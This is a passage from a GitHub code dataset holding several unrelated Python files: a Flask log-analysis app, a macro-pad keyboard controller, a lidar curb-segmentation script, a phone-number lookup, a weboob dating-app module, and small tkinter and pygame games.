'InvalidImageUrl':\n text = 'この画像URLからは取得できません'\n\n elif data['code'] == 'InvalidImageFormat':\n text = '対応していない画像形式です'\n\n else:\n text = 'エラーが発生しました'\n\n print(status, data)\n return text\n\n text = ''\n for region in data['regions']:\n for line in region['lines']:\n for word in line['words']:\n text += word.get('text', '')\n if data['language'] != 'ja':\n text += ' '\n text += '\\n'\n\n if len(text) == 0:\n text += '文字が検出できませんでした'\n\n print('text:', text)\n return text\n\n\nif __name__ == \"__main__\":\n get_text_by_ms(image_url)","repo_name":"slack-evolbot/main-repository","sub_path":"src_teamA/ocr_bot/vision.py","file_name":"vision.py","file_ext":"py","file_size_in_byte":1551,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"73424105843","text":"#!/usr/bin/env python3\n\nimport psycopg2\nfrom flask import Flask, request, redirect, url_for\n\n\nDBNAME = 'news'\n\n\ndef get_popular3articles():\n \"\"\"Return most popular three articles of all time\"\"\"\n db = psycopg2.connect(database=DBNAME)\n cur = db.cursor()\n query = \"\"\" SELECT a.title, count(l.path) as views\n FROM articles a, log l\n WHERE l.path like '/article/' || a.slug\n AND l.status like '%200%'\n GROUP BY a.title\n ORDER BY views desc\n LIMIT 3\n \"\"\"\n cur.execute(query)\n results = cur.fetchall()\n db.close()\n return results\n\n\ndef get_popular_articles_authors():\n \"\"\"Return the most popular article authors of all time\"\"\"\n db = psycopg2.connect(database=DBNAME)\n cur = db.cursor()\n query = \"\"\" SELECT au.name, count(l.path) as views\n FROM log l, articles a\n LEFT JOIN authors au\n ON a.author = au.id\n WHERE l.path like '/article/' || a.slug\n AND l.status like '%200%'\n GROUP BY au.name\n ORDER BY views desc\n \"\"\"\n cur.execute(query)\n results = cur.fetchall()\n db.close()\n return results\n\n\ndef get_error_days():\n \"\"\"Return days on which more than 1% of requests led to errors\"\"\"\n db = psycopg2.connect(database=DBNAME)\n cur = db.cursor()\n query = \"\"\" SELECT a.fdate, (a.failed*100.0/b.total) as percent\n FROM (SELECT date(time) as fdate, count(*) as failed\n FROM log\n WHERE status like '%404%'\n GROUP BY date(time)) as a\n JOIN (SELECT date(time), count(*) as total\n FROM log\n GROUP BY date(time)) as b\n ON a.fdate = b.date\n AND (a.failed*100.0/b.total) > 1.0\n \"\"\"\n cur.execute(query)\n results = cur.fetchall()\n db.close()\n return results\n\n\napp = Flask(__name__)\n\n# HTML template for the Log Analysis page\nHTML_WRAP = '''\\\n\n\n \n Log Analysis\n \n \n \n
\n

Log Analysis

\n
\n \n \n \n \n \n \n \n \n \n
\n
\n \n%s\n \n\n'''\n\n# HTML template for an individual comment\nPOST = '''\\\n
%s
%s
\n'''\n\n\n@app.route('/', methods=['GET'])\ndef main():\n '''Main page for the Analysis.'''\n posts = ''\n html = HTML_WRAP % posts\n return html\n\n\n@app.route('/popolar_articles')\ndef popolar_articles():\n \"\"\"Fetche popular 3 Articles.\"\"\"\n posts = \"\".join(\n POST % (title, views) for title, views in get_popular3articles())\n html = HTML_WRAP % posts\n return html\n\n\n@app.route('/popolar_authors')\ndef popolar_authors():\n \"\"\"Fetche Popular Authors.\"\"\"\n posts = \"\".join(\n POST % (name, views) for name, views in get_popular_articles_authors())\n html = HTML_WRAP % posts\n return html\n\n\n@app.route('/error_days')\ndef error_days():\n \"\"\"Fetche days with more than 1% error.\"\"\"\n posts = \"\".join(\n POST % (fdate, round(percent, 2))\n for fdate, percent in get_error_days())\n html = HTML_WRAP % posts\n return html\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=8000)\n# Run as python log_analysis/log_analysis.py\n","repo_name":"domadn1/log-analysis-app","sub_path":"log_analysis.py","file_name":"log_analysis.py","file_ext":"py","file_size_in_byte":4092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"11153691518","text":"import usb_hid\r\nfrom adafruit_hid.keyboard import Keyboard\r\nfrom adafruit_hid.keyboard_layout_us import KeyboardLayoutUS\r\nfrom adafruit_hid.keycode import Keycode\r\n\r\nfrom adafruit_hid.consumer_control import ConsumerControl\r\nfrom adafruit_hid.consumer_control_code import ConsumerControlCode\r\n\r\ntry:\r\n from typing import Tuple\r\nexcept ImportError:\r\n pass\r\n\r\n\r\nclass Command(object):\r\n def __init__(self, label: str, type: str, color: Tuple[int, int, int], keys, control: str, text: str):\r\n self.label = label\r\n self.type = type\r\n self.color = color\r\n self.keys = keys\r\n self.keys_parsed = []\r\n self.text = text\r\n self.control = control\r\n self.control_parsed = None\r\n\r\n def __repr__(self) -> str:\r\n return f\"Command(label={self.label}, type={self.type}, color={self.color}, keys={self.keys}, control={self.control}, text={self.text})\"\r\n \r\n def __str__(self) -> str:\r\n return self.__repr__()\r\n\r\n @staticmethod\r\n def from_dict(d: dict):\r\n print(f\"Creating command from dict: {d}\")\r\n command = Command(\r\n d.get('label', 'Unknown'),\r\n d.get('type', None),\r\n d.get('color', (0, 0, 0)),\r\n d.get('keys', None),\r\n d.get('control', None),\r\n d.get('text', None)\r\n )\r\n\r\n if command.type == 'key':\r\n if command.keys is None:\r\n raise Exception(f\"Key command must have keys defined: {command}\")\r\n for key in command.keys:\r\n if not hasattr(Keycode, key):\r\n raise Exception(f\"Invalid key: {key}\")\r\n else:\r\n command.keys_parsed.append(getattr(Keycode, key))\r\n print(f\"Converted key: {key} to {getattr(Keycode, key)}\")\r\n if command.type == 'text':\r\n if command.text is None:\r\n raise Exception(f\"Text command must have text defined: {command}\")\r\n if command.type == 'control':\r\n if command.control is None:\r\n raise Exception(f\"Control command must have control defined: {command}\")\r\n if not hasattr(ConsumerControlCode, command.control):\r\n raise Exception(f\"Invalid control: {command.control}\")\r\n else:\r\n command.control_parsed = getattr(ConsumerControlCode, command.control)\r\n return command\r\n\r\n\r\nclass Control:\r\n def __init__(self):\r\n # Set up the keyboard and layout\r\n self.keyboard = Keyboard(usb_hid.devices)\r\n self.layout = KeyboardLayoutUS(self.keyboard)\r\n\r\n # Set up consumer control (used to send media key presses)\r\n self.consumer_control = ConsumerControl(usb_hid.devices)\r\n\r\n def send(self, command):\r\n if command.type == 'key':\r\n self.keyboard.press(*command.keys_parsed)\r\n elif command.type == 'text':\r\n self.layout.write(command.text)\r\n elif command.type == 'control':\r\n self.consumer_control.send(command.control_parsed)\r\n else:\r\n print(f\"Send Control not implemented: {command}\")\r\n \r\n def press(self, command):\r\n print(f\"Pressing command: {command}\")\r\n if command.type == 'key':\r\n print(f\"Pressing key: {command.keys_parsed}\")\r\n self.keyboard.send(*command.keys_parsed)\r\n elif command.type == 'text':\r\n self.layout.write(command.text)\r\n elif command.type == 'control':\r\n self.consumer_control.send(command.control_parsed)\r\n else:\r\n print(f\"Press Control not implemented: {command}\")\r\n\r\n def release(self, command):\r\n print(f\"Releasing command: {command}\")\r\n if command.type == 'key':\r\n print(f\"Releasing key: {command.keys_parsed}\")\r\n self.keyboard.release(*command.keys_parsed)\r\n elif command.type == 'text':\r\n pass\r\n elif command.type == 'control':\r\n pass\r\n else:\r\n print(f\"Release Control not implemented: {command}\")","repo_name":"ntindle/Keybow2040-Macro-Pad","sub_path":"lib/macro_pad/control.py","file_name":"control.py","file_ext":"py","file_size_in_byte":4061,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"6922275866","text":"import numpy as np\nimport open3d as o3d\nimport matplotlib.pyplot as plt\nimport math\nfrom scipy.ndimage import gaussian_filter1d\nfrom scipy import signal\nfrom skimage.measure import LineModel, ransac\nimport utility\nimport time\n\ntheta = np.array([-15, -13, -11, -9, -7, -5, -4])\n\nfor pts_itr in range(1,160,5):\n pts = np.load(str(pts_itr)+'.npy')\n print(\"loaded: \" + str(pts_itr) + \".npy\")\n N_SCAN = 16\n Horizon_SCAN = 1800\n ang_res_x = 0.2\n ang_res_y = 2.0\n ang_bottom = 15.0+0.1\n\n range_image = np.zeros((N_SCAN,1800,7))\n augmented_range_image = np.zeros(range_image.shape)\n dist = []\n\n start_time = time.time()\n\n pc = pts[pts[:,4] < 6]\n aug_start = time.time()\n\n for pt in pc:\n horizonAngle = math.atan2(pt[1], pt[0]) * 180 / math.pi\n dist = np.sqrt(np.square(pt[0]) + np.square(pt[1]) + np.square(pt[2]))\n if(horizonAngle < 60 and horizonAngle > -60) and dist > 1 and dist < 40:\n columnIdx = round(-1*horizonAngle/ang_res_x) + 450\n range_image[int(pt[4]),int(columnIdx),:5] = pt\n range_image[int(pt[4]),int(columnIdx),6] = np.sqrt(np.square(pt[0]) + np.square(pt[1]))\n\n for i in range(6):\n augmented_range_image[i,:,0] = utility.simple_augment_holes(range_image[i,:,0].copy(),.1)\n augmented_range_image[i,:,1] = utility.simple_augment_holes(range_image[i,:,1].copy(),.1)\n augmented_range_image[i,:,2] = utility.simple_augment_holes(range_image[i,:,2].copy(),.1)\n augmented_range_image[i,:,6] = utility.simple_augment_holes(range_image[i,:,6].copy(),.1)\n\n ifl_img = []\n curb_pts = []\n left_curb_pts = []\n right_curb_pts = []\n\n print(\"aug time: \" + str(time.time() - aug_start))\n\n for i in range(0,5):\n # hist,_ = np.histogram(augmented_range_image[i,:,6], bins=50,range=(2,40))\n # max_val = _[hist.argmax()] + 3\n\n hist,_ = np.histogram(augmented_range_image[i,:,2], bins=50,range=(-2,-1))\n max_val = _[hist.argmax()] + .2\n\n print(\"max_val: \"+ str(max_val))\n\n sm_x = gaussian_filter1d(augmented_range_image[i,:,0], 2)\n sm_y = gaussian_filter1d(augmented_range_image[i,:,1], 2)\n dx = np.gradient(sm_x)\n dy = np.gradient(sm_y)\n m = np.arctan2(dy,dx)\n m_filt = signal.medfilt(m,11)\n\n poi_start = time.time()\n infl_pts = utility.poi_5(m_filt, augmented_range_image[i,:,:], max_val)\n # max_dist = np.max(augmented_range_image[i,augmented_range_image[i,:,5] > 0,6])\n\n # print(\"poi time: \" + str(time.time() - poi_start))\n\n # left_curb = np.array([0,10,0])\n # right_curb = np.array([0,-10,0])\n left_pts = []\n right_pts = []\n\n min_dist = _[hist.argmax()] / np.tan(np.radians(theta[i]))\n\n for j in range(infl_pts.shape[0]):\n infl_idx = int(infl_pts[j,0])\n if abs(augmented_range_image[i,infl_idx,1]) <= 11 and abs(augmented_range_image[i,infl_idx,1]) >= 0.5 and abs(augmented_range_image[i,infl_idx,6] - min_dist) < 3:\n # if augmented_range_image[i,int(infl_pts[j,0]),6] < max_dist+0.5 and augmented_range_image[i,int(infl_pts[j,0]),6] > max_dist-2:\n plt.plot(infl_pts[j,0], augmented_range_image[i,int(infl_pts[j,0]),6], 'ro')\n curb_pts.append(augmented_range_image[i,infl_idx,:3])\n\n if augmented_range_image[i,int(infl_pts[j,0]),1] > 0:\n left_pts.append(augmented_range_image[i,int(infl_pts[j,0]),:3])\n\n elif augmented_range_image[i,int(infl_pts[j,0]),1] < 0:\n right_pts.append(augmented_range_image[i,int(infl_pts[j,0]),:3])\n\n # min_height_left = np.min(np.array(left_pts)[:,2])\n # min_height_right = np.min(np.array(right_pts)[:,2])\n\n if len(left_pts) > 0:\n min_height_left = np.min(np.array(left_pts)[:,2])\n print(\"min height left: \" + str(min_height_left))\n for pt in left_pts:\n if pt[2] < min_height_left+0.13:\n left_curb_pts.append(pt)\n\n if len(right_pts) > 0:\n min_height_right = np.min(np.array(right_pts)[:,2])\n print(\"min height right: \" + str(min_height_right))\n for pt in right_pts:\n if pt[2] < min_height_right+0.13:\n right_curb_pts.append(pt)\n\n #plot results\n # plt.plot(augmented_range_image[i,:,0])\n # plt.plot(augmented_range_image[i,:,1])\n # plt.plot(augmented_range_image[i,:,2])\n # plt.plot(augmented_range_image[i,:,6])\n # plt.plot(m_filt)\n # plt.plot(infl_pts[:,0],infl_pts[:,1],'go')\n # plt.plot(augmented_range_image[i+1,:,6] - augmented_range_image[i,:,6])\n # plt.show()\n\n if len(left_curb_pts) > 0:\n model_left, inliers = ransac( np.array(left_curb_pts)[:,:2], LineModel, min_samples=2, residual_threshold=.5, max_trials=1000)\n outliers = inliers == False\n x_left = np.arange(5,15,0.2)\n y_left = model_left.predict_y(x_left)\n z_left = -1.5\n\n if len(right_curb_pts) > 0:\n model_right, inliers = ransac( np.array(right_curb_pts)[:,:2], LineModel, min_samples=2, residual_threshold=1, max_trials=1000)\n outliers = inliers == False\n x_right = np.arange(5,15,0.2)\n y_right = model_right.predict_y(x_right)\n z_right = -1.5\n\n print(\"exec time: \" + str(time.time() - start_time))\n\n geom = []\n\n # visualize pointcloud\n\n for pt in curb_pts:\n pcd = o3d.geometry.TriangleMesh.create_sphere(radius=0.2)\n pcd.paint_uniform_color(np.array([[1.0],[0.0],[0.0]], dtype=np.float64))\n pcd.translate(pt)\n geom.append(pcd)\n \n for pt in left_curb_pts:\n pcd = o3d.geometry.TriangleMesh.create_sphere(radius=0.4)\n pcd.paint_uniform_color(np.array([[1.0],[1.0],[0.0]], dtype=np.float64))\n pcd.translate(pt)\n geom.append(pcd)\n \n for pt in right_curb_pts:\n pcd = o3d.geometry.TriangleMesh.create_sphere(radius=0.4)\n pcd.paint_uniform_color(np.array([[1.0],[0.0],[1.0]], dtype=np.float64))\n pcd.translate(pt)\n geom.append(pcd)\n\n for i in range(y_left.shape[0]):\n pcd = o3d.geometry.TriangleMesh.create_sphere(radius=0.3)\n pcd.paint_uniform_color(np.array([[0.0],[0.5],[0.5]], dtype=np.float64))\n pcd.translate([x_left[i],y_left[i],z_left])\n geom.append(pcd)\n \n for i in range(y_right.shape[0]):\n pcd = o3d.geometry.TriangleMesh.create_sphere(radius=0.3)\n pcd.paint_uniform_color(np.array([[0.0],[0.5],[0.5]], dtype=np.float64))\n pcd.translate([x_right[i],y_right[i],z_right])\n geom.append(pcd)\n\n mesh_frame = o3d.geometry.TriangleMesh.create_coordinate_frame(size=3.0, origin=np.array([0., 0., 0.]))\n geom.append(mesh_frame)\n\n pcd_test = o3d.geometry.PointCloud()\n pcd_test.points = o3d.utility.Vector3dVector(pc[:,:3])\n pcd_test.paint_uniform_color(np.array([[0.0],[0.8],[0.0]], dtype=np.float64))\n geom.append(pcd_test)\n\n o3d.visualization.draw_geometries(geom)","repo_name":"moloydas/road_segmentation_lidar","sub_path":"segment_road_v4.py","file_name":"segment_road_v4.py","file_ext":"py","file_size_in_byte":7075,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"41430397480","text":"import tkinter as tk\n\nclass WelcomePage(tk.Frame):\n def __init__(self, wizard, width = 100, height = 50):\n tk.Frame.__init__(self, wizard, width = width, height = height)\n self._wizard = wizard\n\n text = tk.Label(self, \n text=\"Welcome to Codelive, Thonny's MQTT based collaboration plugin!\")\n \n button_frame = tk.Frame(self)\n \n host_button = tk.Button(button_frame, text=\"Host a Session\", command=self.host_callback)\n host_button.pack(side=tk.LEFT, fill=tk.X, expand = True, padx = 5)\n join_button = tk.Button(button_frame, text=\"Join a Session\", command=self.join_callback)\n join_button.pack(side=tk.LEFT, fill=tk.X, expand = True, padx = 5)\n\n cancel_button = tk.Button(self,\n text=\"Cancel\",\n command=self.cancel_callback,\n fg = \"red\")\n\n text.pack(expand=True, padx = 10, pady = 10)\n button_frame.pack(fill=tk.X, expand=True, pady=5)\n cancel_button.pack(side=tk.BOTTOM, fill=tk.X, expand=True)\n\n def host_callback(self):\n self._wizard.data[\"mode\"] = \"host\"\n self._wizard.show_page(\"host:1\")\n \n def join_callback(self):\n self._wizard.data[\"mode\"] = \"client\"\n self._wizard.show_page(\"client:1\")\n\n def cancel_callback(self):\n self._wizard.data[\"mode\"] = \"cancelled\"\n self._wizard.destroy()\n\nif __name__ == \"__main__\":\n\n root = tk.Tk()\n top = WelcomePage(root)\n WelcomePage.pack(self = top, fill=tk.BOTH, expand=True, padx=20, pady=20)\n root.mainloop()","repo_name":"codelive-project/expts","sub_path":"StartUpWiz/welcome_page.py","file_name":"welcome_page.py","file_ext":"py","file_size_in_byte":1637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"35845435470","text":"# Install the phonenumbers module by typing the following command in command prompt.\n# pip install phonenumbers\nimport phonenumbers\nfrom phonenumbers import carrier, geocoder, timezone\nmobileNo = input(\"Enter Mobile Number with Country code: \")\nmobileNo = phonenumbers.parse(mobileNo)\n\n# get timezone a phone number\ntimeZone = timezone.time_zones_for_number(mobileNo)\nprint(\"timezone: \", timeZone)\n# Getting carrier of a phone number\nCarrier = carrier.name_for_number(mobileNo, 'en')\n# Getting region information\nRegion = geocoder.description_for_number(mobileNo, 'en')\n# Printing the carrier and region of a phone number\nprint(\"Carrier: \", Carrier)\nprint(\"Region: \", Region)\n# Validating a phone number\nvalid = phonenumbers.is_valid_number(mobileNo)\n# Checking possibility of a number\npossible = phonenumbers.is_possible_number(mobileNo)\n# Printing the output\nprint(\"Valid: \", valid)\nprint(\"Possible: \", possible)\n","repo_name":"darishodzic/Phone-number-details","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"74938330481","text":"import pygame\nimport cdkk\nimport random\n\napp_styles = {\n \"Ninja\": {\"fillcolour\": \"yellow\", \"shape\": \"Ellipse\", \"width\": 80, \"height\": 60}\n}\ncdkk.stylesheet.add_stylesheet(app_styles)\n\n# --------------------------------------------------\n\n\nclass Sprite_Ninja(cdkk.Sprite_TextBox):\n def __init__(self, posx, posy):\n super().__init__(\"Ninja\", style=cdkk.stylesheet.style(\"Ninja\"))\n self.rect.left = posx\n self.rect.top = posy\n # Initialise the Ninja sprite\n\n def start_game(self):\n super().start_game()\n self.set_style(\"fillcolour\", \"green\")\n\n def end_game(self):\n self.set_style(\"fillcolour\", \"red1\")\n super().end_game()\n\n def update(self):\n super().update()\n # Update is called for the sprite during every game loop\n\n def draw(self):\n super().draw()\n # Draw is called for the sprite during every game loop\n\n\n# --------------------------------------------------\n\nclass Manager_Ninja(cdkk.SpriteManager):\n def __init__(self, limits):\n super().__init__(\"Ninja Manager\")\n self.limits = limits\n\n def event(self, e):\n dealt_with = super().event(e)\n if not dealt_with and e.type == cdkk.EVENT_GAME_CONTROL:\n if e.action == \"NewNinja\":\n self.add_ninja()\n dealt_with = True\n elif e.action == \"ClearNinjas\":\n self.clear_ninjas()\n dealt_with = True\n return dealt_with\n\n def move_cave_items(self):\n sprites = self.find_sprites_by_desc(\"Cave Item\", True)\n for s in sprites:\n s.scroll(-self.cave.cave_section_size)\n\n def add_ninja(self):\n posx = random.randint(0, self.limits.width-200) + 100\n posy = random.randint(0, self.limits.height-150) + 75\n self.add(Sprite_Ninja(posx, posy))\n\n def clear_ninjas(self):\n self.empty()\n\n def update(self):\n super().update()\n # Update is called for the sprite during every game loop\n # For moving objects, call self.rect.move_physics() or use self.set_config(\"auto_move_physics\", True)\n\n def start_game(self):\n super().start_game()\n # This is called each time a game starts\n # Typically this is where sprites are created/reset\n\n def end_game(self):\n # This is called each time a game ends\n # Typically this is where sprites are removed\n super().end_game()\n\n# --------------------------------------------------\n\n\nclass Manager_Scoreboard(cdkk.SpriteManager):\n def __init__(self, game_time, limits):\n super().__init__(\"Scoreboard Manager\")\n score_style = {\"fillcolour\": None, \"align_horiz\": \"L\"}\n\n self._game_time = game_time\n self._timer = None\n self._time_left = cdkk.Sprite_DynamicText(\n \"Time Left\", cdkk.cdkkRect(10, 10, 200, 40), score_style)\n self._time_left.set_text_format(\"Time Left: {0:0.1f}\", 0)\n self.add(self._time_left)\n\n self._fps = cdkk.Sprite_DynamicText(\n \"FPS\", cdkk.cdkkRect(10, 60, 200, 40), score_style)\n self._fps.set_text_format(\"FPS: {0:4.1f}\", 0)\n self.add(self._fps)\n\n self._game_over = cdkk.Sprite_GameOver(limits)\n\n def set_fps(self, new_fps):\n self._fps.set_text(new_fps)\n\n def slow_update(self):\n # This is called around 3 times per sec and is for updates that don't need to happen every game loop\n if self.game_is_active:\n self._time_left.set_text(self._timer.time_left)\n\n def start_game(self):\n super().start_game()\n self._timer = cdkk.Timer(\n self._game_time, cdkk.EVENT_GAME_TIMER_1, auto_start=True)\n self.remove(self._game_over)\n\n def end_game(self):\n self.add(self._game_over)\n super().end_game()\n\n# --------------------------------------------------\n\n\nclass MyGame(cdkk.PyGameApp):\n def init(self):\n super().init()\n\n self.ninja_mgr = Manager_Ninja(self.boundary)\n self.scoreboard_mgr = Manager_Scoreboard(10, self.boundary)\n\n self.add_sprite_mgr(self.ninja_mgr)\n self.add_sprite_mgr(self.scoreboard_mgr)\n\n key_map = {\n pygame.K_q: \"Quit\",\n pygame.K_s: \"StartGame\",\n pygame.K_n: \"NewNinja\",\n pygame.K_e: \"GameOver\",\n pygame.K_c: \"ClearNinjas\"\n }\n user_event_map = {\n cdkk.EVENT_GAME_TIMER_1: \"GameOver\"\n }\n self.event_mgr.event_map(\n key_event_map=key_map, user_event_map=user_event_map)\n\n def update(self):\n super().update()\n self.scoreboard_mgr.set_fps(theApp.loops_per_sec)\n # Manage interaction between Sprites in different SpriteManagers\n\n# --------------------------------------------------\n\n\napp_config = {\n \"width\": 1200, \"height\": 800,\n \"background_fill\": \"burlywood\",\n \"caption\": \"My Game\",\n \"auto_start\": False\n}\ntheApp = MyGame(app_config)\ntheApp.execute()\n","repo_name":"BrianDunneKK/cdkk","sub_path":"pygame/cdkkGameTemplate.py","file_name":"cdkkGameTemplate.py","file_ext":"py","file_size_in_byte":4965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"9429737841","text":"import datetime\n\nfrom weboob.tools.compat import unicode\nfrom weboob.capabilities.messages import CapMessages, CapMessagesPost, Thread, Message\nfrom weboob.capabilities.dating import CapDating, Optimization\nfrom weboob.capabilities.account import CapAccount, StatusField\nfrom weboob.tools.backend import Module, BackendConfig\nfrom weboob.tools.value import Value, ValueBackendPassword\nfrom weboob.tools.date import local2utc\nfrom weboob.tools.log import getLogger\n\nfrom .browser import PlayMeBrowser, FacebookBrowser, NoCredits\n\n\n__all__ = ['PlayMeModule']\n\n\nclass ProfilesWalker(Optimization):\n def __init__(self, sched, storage, browser):\n super(ProfilesWalker, self).__init__()\n self._sched = sched\n self._storage = storage\n self._browser = browser\n self._logger = getLogger('walker', browser.logger)\n\n self._view_cron = None\n\n def start(self):\n self._view_cron = self._sched.schedule(1, self.view_profile)\n return True\n\n def stop(self):\n self._sched.cancel(self._view_cron)\n self._view_cron = None\n return True\n\n def set_config(self, params):\n pass\n\n def is_running(self):\n return self._view_cron is not None\n\n def view_profile(self):\n delay = 900\n try:\n challenged = self._storage.get('challenged', default=[])\n for user in self._browser.find_users(48.883989, 2.367168):\n if user['id'] in challenged:\n continue\n\n try:\n self._browser.challenge(user['id'])\n except NoCredits as e:\n delay = int(str(e))\n self._logger.info('No more credits (next try in %d minutes)', (delay/60))\n else:\n self._logger.info('Challenged %s', user['name'])\n challenged.append(user['id'])\n self._storage.set('challenged', challenged)\n self._storage.save()\n break\n finally:\n if self._view_cron is not None:\n self._view_cron = self._sched.schedule(delay, self.view_profile)\n\n\nclass PlayMeModule(Module, CapMessages, CapMessagesPost, CapDating, CapAccount):\n NAME = 'playme'\n DESCRIPTION = u'PlayMe dating mobile application'\n MAINTAINER = u'Roger Philibert'\n EMAIL = 'roger.philibert@gmail.com'\n LICENSE = 'AGPLv3+'\n VERSION = '2.1'\n CONFIG = BackendConfig(Value('username', label='Facebook email'),\n ValueBackendPassword('password', label='Facebook password'))\n\n BROWSER = PlayMeBrowser\n STORAGE = {'contacts': {},\n 'challenged': [],\n }\n\n def create_default_browser(self):\n facebook = FacebookBrowser()\n facebook.login(self.config['username'].get(),\n self.config['password'].get())\n return self.create_browser(facebook)\n\n # ---- CapDating methods -----------------------\n\n def init_optimizations(self):\n self.add_optimization('PROFILE_WALKER', ProfilesWalker(self.weboob.scheduler, self.storage, self.browser))\n\n # ---- CapMessages methods ---------------------\n\n def fill_thread(self, thread, fields):\n return self.get_thread(thread)\n\n def iter_threads(self):\n for thread in self.browser.get_threads():\n t = Thread(thread['id'])\n t.flags = Thread.IS_DISCUSSION\n t.title = u'Discussion with %s' % thread['name']\n t.date = local2utc(datetime.datetime.fromtimestamp(thread['last_message']['utc_timestamp']))\n yield t\n\n def get_thread(self, thread):\n if not isinstance(thread, Thread):\n thread = Thread(thread)\n thread.flags = Thread.IS_DISCUSSION\n\n user = self.browser.get_user(thread.id)\n thread.title = u'Discussion with %s' % user['name']\n\n contact = self.storage.get('contacts', thread.id, default={'lastmsg': 0})\n\n signature = u'Age: %s' % user['age']\n signature += u'\\nLast online: %s' % user['last_online']\n signature += u'\\nPhotos:\\n\\t%s' % '\\n\\t'.join([user['photo_host'] + photo['large'] for photo in user['photos']])\n\n child = None\n\n for msg in self.browser.get_thread_messages(thread.id):\n flags = 0\n if int(contact['lastmsg']) < msg['utc_timestamp']:\n flags = Message.IS_UNREAD\n\n if msg['type'] == 'msg':\n content = unicode(msg['msg'])\n elif msg['type'] == 'new_challenge':\n content = u'A new challenge has been proposed!'\n elif msg['type'] == 'serie':\n content = u\"I've played\"\n elif msg['type'] == 'end_game':\n content = u'%s is the winner! (%s VS %s)' % (self.browser.my_name if msg['score']['w'] == self.browser.my_id else user['name'], msg['score']['s'][0], msg['score']['s'][1])\n else:\n content = u'Unknown action: %s' % msg['type']\n\n msg = Message(thread=thread,\n id=msg['utc_timestamp'],\n title=thread.title,\n sender=unicode(self.browser.my_name if msg['from'] == self.browser.my_id else user['name']),\n receivers=[unicode(self.browser.my_name if msg['from'] != self.browser.my_id else user['name'])],\n date=local2utc(datetime.datetime.fromtimestamp(msg['utc_timestamp'])),\n content=content,\n children=[],\n parent=None,\n signature=signature if msg['from'] != self.browser.my_id else u'',\n flags=flags)\n\n if child:\n msg.children.append(child)\n child.parent = msg\n child = msg\n thread.root = child\n\n return thread\n\n def iter_unread_messages(self):\n for thread in self.iter_threads():\n thread = self.get_thread(thread)\n for message in thread.iter_all_messages():\n if message.flags & message.IS_UNREAD:\n yield message\n\n def set_message_read(self, message):\n contact = self.storage.get('contacts', message.thread.id, default={'lastmsg': 0})\n if int(contact['lastmsg']) < int(message.id):\n contact['lastmsg'] = int(message.id)\n self.storage.set('contacts', message.thread.id, contact)\n self.storage.save()\n\n # ---- CapMessagesPost methods ---------------------\n\n def post_message(self, message):\n self.browser.post_message(message.thread.id, message.content)\n\n # ---- CapAccount methods ---------------------\n\n def get_account_status(self):\n return (StatusField(u'myname', u'My name', unicode(self.browser.my_name)),\n StatusField(u'credits', u'Credits', unicode(self.browser.credits)),\n )\n\n OBJECTS = {Thread: fill_thread,\n }\n","repo_name":"laurentb/weboob","sub_path":"modules/playme/module.py","file_name":"module.py","file_ext":"py","file_size_in_byte":7023,"program_lang":"python","lang":"en","doc_type":"code","stars":93,"dataset":"github-code","pt":"75"} +{"seq_id":"38352687702","text":"from tkinter import *\r\nfrom Logic import *\r\nimport Colours\r\n\r\nfrom random import randint\r\nfrom copy import deepcopy\r\n\r\n\r\nclass Game:\r\n def __init__(self, board):\r\n self.board = board\r\n self.root = Tk()\r\n self.root.title(\"2048\")\r\n self.root.geometry(\"345x440\")\r\n self.root.resizable(False, False)\r\n\r\n game_name = Label(\r\n self.root,\r\n text=\"2048\",\r\n fg=\"#776e65\",\r\n font=(\r\n \"Sans Serif\",\r\n 55),\r\n anchor=\"nw\")\r\n game_name.place(x=17, y=20, width=160, height=100)\r\n\r\n objective1 = Label(\r\n self.root,\r\n text=\"Join the numbers and get to the\",\r\n fg=\"#776e65\",\r\n font=(\r\n \"Arial\",\r\n 7),\r\n anchor=\"w\")\r\n objective1.place(x=17, y=85, width=150, height=15)\r\n self.objective2 = Label(\r\n self.root, fg=\"#776e65\", font=(\r\n \"Arial\", 7, \"bold\"), anchor=\"w\")\r\n self.objective2.place(x=153, y=85, width=60, height=15)\r\n\r\n self.game_name_3x3 = Label(\r\n self.root, fg=\"#776e65\", font=(\r\n \"Sans Serif\", 10, \"bold\"))\r\n self.game_name_3x3.place(x=130, y=53)\r\n\r\n sc_frame = LabelFrame(self.root, bg=Colours.score_label_bg, bd=0)\r\n sc_frame.place(x=210, y=40, width=55, height=30)\r\n\r\n sc_head = Label(\r\n sc_frame,\r\n text=\"SCORE\",\r\n font=(\r\n \"Sans Serif\",\r\n 7,\r\n \"bold\"),\r\n fg=\"#eee4da\",\r\n bg=Colours.score_label_bg)\r\n sc_head.place(x=3, y=16, width=50, height=12)\r\n self.score_value = Label(sc_frame, text=str(self.board.score), font=(\r\n \"Sans Serif\", 10, \"bold\"), fg=\"#faf5ef\", bg=Colours.score_label_bg)\r\n self.score_value.place(x=3, y=2, width=50, height=15)\r\n\r\n self.hi_sc()\r\n\r\n hsc_frame = LabelFrame(self.root, bg=Colours.score_label_bg, bd=0)\r\n hsc_frame.place(x=270, y=40, width=55, height=30)\r\n\r\n hsc_head = Label(\r\n hsc_frame,\r\n text=\"BEST\",\r\n font=(\r\n \"Sans Serif\",\r\n 7,\r\n \"bold\"),\r\n fg=\"#eee4da\",\r\n bg=Colours.score_label_bg)\r\n hsc_head.place(x=3, y=16, width=50, height=12)\r\n self.hsc_value = Label(\r\n hsc_frame,\r\n text=self.hi_score,\r\n font=(\r\n \"Sans Serif\",\r\n 10,\r\n \"bold\"),\r\n fg=\"#faf5ef\",\r\n bg=Colours.score_label_bg)\r\n self.hsc_value.place(x=3, y=2, width=50, height=15)\r\n\r\n und = Button(\r\n self.root,\r\n text=\"Undo\",\r\n width=32,\r\n height=4,\r\n font=(\r\n \"Arial\",\r\n 8,\r\n \"bold\"),\r\n 